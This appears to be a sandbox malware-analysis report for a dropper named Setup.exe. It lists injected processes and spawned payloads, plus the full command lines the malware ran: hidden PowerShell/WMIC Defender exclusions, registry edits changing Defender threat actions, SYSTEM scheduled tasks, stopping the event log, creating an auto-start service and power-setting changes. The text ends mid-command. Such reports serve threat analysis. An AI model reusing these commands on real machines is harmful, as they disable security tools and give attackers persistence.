b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe 2212 b9fcde3053.exe -
Suspicious use of SetWindowsHookEx 47 IoCs
pid Process 1184 Setup.exe 1784 Setup.exe 4992 6AzFaABBWzIB3fzN1U16jtOf.exe 3164 yhHzUVDC2pAw9goJepU_qORY.exe 564 5XopSKg9PUSZohSIWN2v9xOT.exe 2972 Klk_ndJuZUINtD72UfY7IaBv.exe 3724 1vI2dSu9Otp3tPl9bmA85PJf.exe 2848 cJGyky9EhCckJumZf6fkM6G5.exe 4528 QwpLixYOI92BLmCZFEhE6Mbs.exe 4528 QwpLixYOI92BLmCZFEhE6Mbs.exe 200 Klk_ndJuZUINtD72UfY7IaBv.tmp 4468 RegAsm.exe 1032 Install.exe 3656 MSBuild.exe 1252 Install.exe 2124 MSBuild.exe 2636 goldenmusicalvariety32_64.exe 772 RegAsm.exe 5104 Install.exe 1492 Install.exe 1524 goldenmusicalvariety32_64.exe 3736 BitLockerToGo.exe 2060 cmd.exe 4824 67f535e337.exe 4824 67f535e337.exe 2212 b9fcde3053.exe 1744 firefox.exe 5756 BFCFBFBFBK.exe 5864 RegAsm.exe 6004 KFIJJJEBGC.exe 6040 RegAsm.exe 5032 firefox.exe 4044 Setup.exe 2672 Setup.exe 6036 av_cOAXWNrelQa039CGbm0A1.exe 4912 IRrr6YljmO8hEIxi45BS9F3G.exe 5448 4Iy1KUXaumS5KWIhCg2YizTi.exe 2364 sxM96ISlNbOtGCb6tmhTPqMM.exe 5448 4Iy1KUXaumS5KWIhCg2YizTi.exe 6048 7NybowgkTtFNZ6zV5tAShfiu.exe 1784 av_cOAXWNrelQa039CGbm0A1.tmp 1496 MSBuild.exe 2236 MSBuild.exe 3020 RegAsm.exe 2956 RegAsm.exe 1612 BitLockerToGo.exe 940 Setup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1184 wrote to memory of 1916 1184 Setup.exe 88 PID 1184 wrote to memory of 1916 1184 Setup.exe 88 PID 1184 wrote to memory of 1916 1184 Setup.exe 88 PID 1184 wrote to memory of 4528 1184 Setup.exe 89 PID 1184 wrote to memory of 4528 1184 Setup.exe 89 PID 1184 wrote to memory of 4528 1184 Setup.exe 89 PID 1184 wrote to memory of 3724 1184 Setup.exe 90 PID 1184 wrote to memory of 3724 1184 Setup.exe 90 PID 1184 wrote to memory of 3724 1184 Setup.exe 90 PID 1184 wrote to memory of 2972 1184 Setup.exe 92 PID 1184 wrote to memory of 2972 1184 Setup.exe 92 PID 1184 wrote to memory of 2972 1184 Setup.exe 92 PID 1184 wrote to memory of 1096 1184 Setup.exe 95 PID 1184 wrote to memory of 1096 1184 Setup.exe 95 PID 1184 wrote to memory of 564 1184 Setup.exe 93 PID 1184 wrote to memory of 564 1184 Setup.exe 93 PID 1184 wrote to memory of 564 1184 Setup.exe 93 PID 1184 wrote to memory of 3164 1184 Setup.exe 91 PID 1184 wrote to memory of 3164 1184 Setup.exe 91 PID 1184 wrote to memory of 3164 1184 Setup.exe 91 PID 1184 wrote to memory of 3980 1184 Setup.exe 94 PID 1184 wrote to memory of 3980 1184 Setup.exe 94 PID 1184 wrote to memory of 2848 1184 Setup.exe 98 PID 1184 wrote to memory of 2848 1184 Setup.exe 98 PID 1184 wrote to memory of 2848 1184 Setup.exe 98 PID 1184 wrote to memory of 2324 1184 Setup.exe 96 PID 1184 wrote to memory of 2324 1184 Setup.exe 96 PID 1184 wrote to memory of 2324 1184 Setup.exe 96 PID 1184 wrote to memory of 4992 1184 Setup.exe 97 PID 1184 wrote to memory of 4992 1184 Setup.exe 97 PID 1184 wrote to memory of 4992 1184 Setup.exe 97 PID 2972 wrote to memory of 200 2972 Klk_ndJuZUINtD72UfY7IaBv.exe 99 PID 2972 wrote to memory of 200 2972 Klk_ndJuZUINtD72UfY7IaBv.exe 99 PID 2972 wrote to memory of 200 2972 Klk_ndJuZUINtD72UfY7IaBv.exe 99 PID 2848 wrote to memory of 4468 2848 cJGyky9EhCckJumZf6fkM6G5.exe 100 PID 2848 wrote to memory of 4468 2848 cJGyky9EhCckJumZf6fkM6G5.exe 100 PID 2848 wrote to memory of 4468 
2848 cJGyky9EhCckJumZf6fkM6G5.exe 100 PID 2848 wrote to memory of 4468 2848 cJGyky9EhCckJumZf6fkM6G5.exe 100 PID 2848 wrote to memory of 4468 2848 cJGyky9EhCckJumZf6fkM6G5.exe 100 PID 2848 wrote to memory of 4468 2848 cJGyky9EhCckJumZf6fkM6G5.exe 100 PID 2848 wrote to memory of 4468 2848 cJGyky9EhCckJumZf6fkM6G5.exe 100 PID 2848 wrote to memory of 4468 2848 cJGyky9EhCckJumZf6fkM6G5.exe 100 PID 4992 wrote to memory of 1032 4992 6AzFaABBWzIB3fzN1U16jtOf.exe 101 PID 4992 wrote to memory of 1032 4992 6AzFaABBWzIB3fzN1U16jtOf.exe 101 PID 4992 wrote to memory of 1032 4992 6AzFaABBWzIB3fzN1U16jtOf.exe 101 PID 1916 wrote to memory of 240 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 103 PID 1916 wrote to memory of 240 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 103 PID 1916 wrote to memory of 240 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 103 PID 3164 wrote to memory of 1252 3164 yhHzUVDC2pAw9goJepU_qORY.exe 102 PID 3164 wrote to memory of 1252 3164 yhHzUVDC2pAw9goJepU_qORY.exe 102 PID 3164 wrote to memory of 1252 3164 yhHzUVDC2pAw9goJepU_qORY.exe 102 PID 2324 wrote to memory of 3656 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe 104 PID 2324 wrote to memory of 3656 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe 104 PID 2324 wrote to memory of 3656 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe 104 PID 1916 wrote to memory of 1852 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 105 PID 1916 wrote to memory of 1852 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 105 PID 1916 wrote to memory of 1852 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 105 PID 2324 wrote to memory of 3656 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe 104 PID 2324 wrote to memory of 3656 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe 104 PID 2324 wrote to memory of 3656 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe 104 PID 2324 wrote to memory of 3656 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe 104 PID 2324 wrote to memory of 3656 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe 104 PID 2324 wrote to memory of 3656 2324 vmr4hdyC4X94dgX9Bh3X3e0n.exe 104 PID 1916 wrote to memory of 3592 1916 cFb2c7uKqYcOaECU8XsTAIef.exe 106 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\archive.zip1⤵PID:2640
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3580
C:\Users\Admin\Desktop\Setup.exe"C:\Users\Admin\Desktop\Setup.exe"1⤵
- Modifies firewall policy service
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Users\Admin\Documents\SimpleAdobe\cFb2c7uKqYcOaECU8XsTAIef.exeC:\Users\Admin\Documents\SimpleAdobe\cFb2c7uKqYcOaECU8XsTAIef.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:240
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:1852
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:3592
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2124 -
C:\ProgramData\BFCFBFBFBK.exe"C:\ProgramData\BFCFBFBFBK.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:5756 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:5824
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:5864
C:\ProgramData\KFIJJJEBGC.exe"C:\ProgramData\KFIJJJEBGC.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:6004 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- Suspicious use of SetWindowsHookEx
PID:6040
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FHIDAKFIJJKJ" & exit4⤵PID:3912
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- Delays execution with timeout.exe
PID:3600
C:\Users\Admin\Documents\SimpleAdobe\QwpLixYOI92BLmCZFEhE6Mbs.exeC:\Users\Admin\Documents\SimpleAdobe\QwpLixYOI92BLmCZFEhE6Mbs.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4528 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\JJECAAEHCF.exe"3⤵PID:3076
C:\Users\Admin\AppData\Local\Temp\JJECAAEHCF.exe"C:\Users\Admin\AppData\Local\Temp\JJECAAEHCF.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5056 -
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe"C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4208 -
C:\Users\Admin\AppData\Local\Temp\1000006001\67f535e337.exe"C:\Users\Admin\AppData\Local\Temp\1000006001\67f535e337.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4824
C:\Users\Admin\AppData\Local\Temp\1000011001\b9fcde3053.exe"C:\Users\Admin\AppData\Local\Temp\1000011001\b9fcde3053.exe"6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2212 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account7⤵PID:4480
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1744 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1464 -prefMapHandle 1476 -prefsLen 25751 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {48ad2d88-7ccf-416d-bddb-5c705a201fe8} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" gpu9⤵PID:4288
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2408 -parentBuildID 20240401114208 -prefsHandle 2400 -prefMapHandle 2396 -prefsLen 26671 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2295a223-894b-4451-ab2b-f5dd216ec283} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" socket9⤵PID:2080
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3264 -childID 1 -isForBrowser -prefsHandle 3256 -prefMapHandle 3252 -prefsLen 22698 -prefMapSize 244658 -jsInitHandle 976 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e20f165-eac5-4cf4-a691-87ca10f227cd} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" tab9⤵PID:1452
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4112 -childID 2 -isForBrowser -prefsHandle 4104 -prefMapHandle 4092 -prefsLen 31161 -prefMapSize 244658 -jsInitHandle 976 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2577d75e-42c8-4294-bcbb-59c22cee37af} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" tab9⤵PID:5080
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2748 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4656 -prefMapHandle 4832 -prefsLen 31161 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {74613018-6594-425f-8b1a-b94e0ccc0b9f} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" utility9⤵
- Checks processor information in registry
PID:5320
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5488 -childID 3 -isForBrowser -prefsHandle 5480 -prefMapHandle 5476 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 976 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f6550c75-03fd-4f92-bc14-2d585aeab22d} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" tab9⤵PID:4448
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5620 -childID 4 -isForBrowser -prefsHandle 5628 -prefMapHandle 5632 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 976 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3b9f3ae5-fe4f-4e0f-b547-04573c1eb0d0} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" tab9⤵PID:4784
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5812 -childID 5 -isForBrowser -prefsHandle 5820 -prefMapHandle 5824 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 976 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e789692e-dab1-46a0-95dc-2a2a63144e19} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" tab9⤵PID:464
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\EGHCBKKKFH.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:2060
C:\Users\Admin\Documents\SimpleAdobe\1vI2dSu9Otp3tPl9bmA85PJf.exeC:\Users\Admin\Documents\SimpleAdobe\1vI2dSu9Otp3tPl9bmA85PJf.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3724
C:\Users\Admin\Documents\SimpleAdobe\yhHzUVDC2pAw9goJepU_qORY.exeC:\Users\Admin\Documents\SimpleAdobe\yhHzUVDC2pAw9goJepU_qORY.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3164
C:\Users\Admin\AppData\Local\Temp\7zSB1D8.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1252
C:\Users\Admin\AppData\Local\Temp\7zSBF45.tmp\Install.exe.\Install.exe /wdcUdidEsSsd "385132" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:5104
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:4740
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:2384
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:236
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4952
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "beIeSqxTUIgkrqSZzo" /SC once /ST 23:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSBF45.tmp\Install.exe\" tg /udfdidUwig 385132 /S" /V1 /F5⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4092
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5104 -s 8285⤵
- Program crash
PID:2364
C:\Users\Admin\Documents\SimpleAdobe\Klk_ndJuZUINtD72UfY7IaBv.exeC:\Users\Admin\Documents\SimpleAdobe\Klk_ndJuZUINtD72UfY7IaBv.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2972
C:\Users\Admin\AppData\Local\Temp\is-RORIG.tmp\Klk_ndJuZUINtD72UfY7IaBv.tmp"C:\Users\Admin\AppData\Local\Temp\is-RORIG.tmp\Klk_ndJuZUINtD72UfY7IaBv.tmp" /SL5="$B003E,5207631,54272,C:\Users\Admin\Documents\SimpleAdobe\Klk_ndJuZUINtD72UfY7IaBv.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:200
C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe"C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe" -i4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2636
C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe"C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe" -s4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1524
C:\Users\Admin\Documents\SimpleAdobe\5XopSKg9PUSZohSIWN2v9xOT.exeC:\Users\Admin\Documents\SimpleAdobe\5XopSKg9PUSZohSIWN2v9xOT.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:564
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:772
C:\Users\Admin\Documents\SimpleAdobe\KAIgHVGHtDFBzfjGkrU7kU8s.exeC:\Users\Admin\Documents\SimpleAdobe\KAIgHVGHtDFBzfjGkrU7kU8s.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3980
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:1620
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:1816
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
PID:2384
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
PID:2112
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "CIFUBVHI"3⤵
- Launches sc.exe
PID:4288
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"3⤵
- Launches sc.exe
PID:4880
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:3416
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "CIFUBVHI"3⤵
- Launches sc.exe
PID:3996
C:\Users\Admin\Documents\SimpleAdobe\dz_LhQg5VnMy0wlI_6dK0bLe.exeC:\Users\Admin\Documents\SimpleAdobe\dz_LhQg5VnMy0wlI_6dK0bLe.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1096
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe3⤵
- Suspicious use of SetWindowsHookEx
PID:3736
C:\Users\Admin\Documents\SimpleAdobe\vmr4hdyC4X94dgX9Bh3X3e0n.exeC:\Users\Admin\Documents\SimpleAdobe\vmr4hdyC4X94dgX9Bh3X3e0n.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2324
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3656
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JKECFCFBGDHI" & exit4⤵PID:5000
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- Delays execution with timeout.exe
PID:1984
C:\Users\Admin\Documents\SimpleAdobe\6AzFaABBWzIB3fzN1U16jtOf.exeC:\Users\Admin\Documents\SimpleAdobe\6AzFaABBWzIB3fzN1U16jtOf.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4992
C:\Users\Admin\AppData\Local\Temp\7zSB1C8.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1032
C:\Users\Admin\AppData\Local\Temp\7zSBE7A.tmp\Install.exe.\Install.exe /iVYHKdidh "525403" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:1492
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:2232
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:4820
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4208
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1496
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bIOEZkRAagKtMyjtNl" /SC once /ST 23:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSBE7A.tmp\Install.exe\" Ij /spoadidY 525403 /S" /V1 /F5⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4972
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 7965⤵
- Program crash
PID:2284
C:\Users\Admin\Documents\SimpleAdobe\cJGyky9EhCckJumZf6fkM6G5.exeC:\Users\Admin\Documents\SimpleAdobe\cJGyky9EhCckJumZf6fkM6G5.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2848
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4468
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1848
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4880
C:\Users\Admin\Desktop\Setup.exe"C:\Users\Admin\Desktop\Setup.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1784
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exeC:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1472
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:3672
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:4404
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:3348
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:708
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:3056
C:\Windows\system32\svchost.exesvchost.exe2⤵PID:1448
C:\Users\Admin\AppData\Local\Temp\7zSBE7A.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSBE7A.tmp\Install.exe Ij /spoadidY 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5180
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD 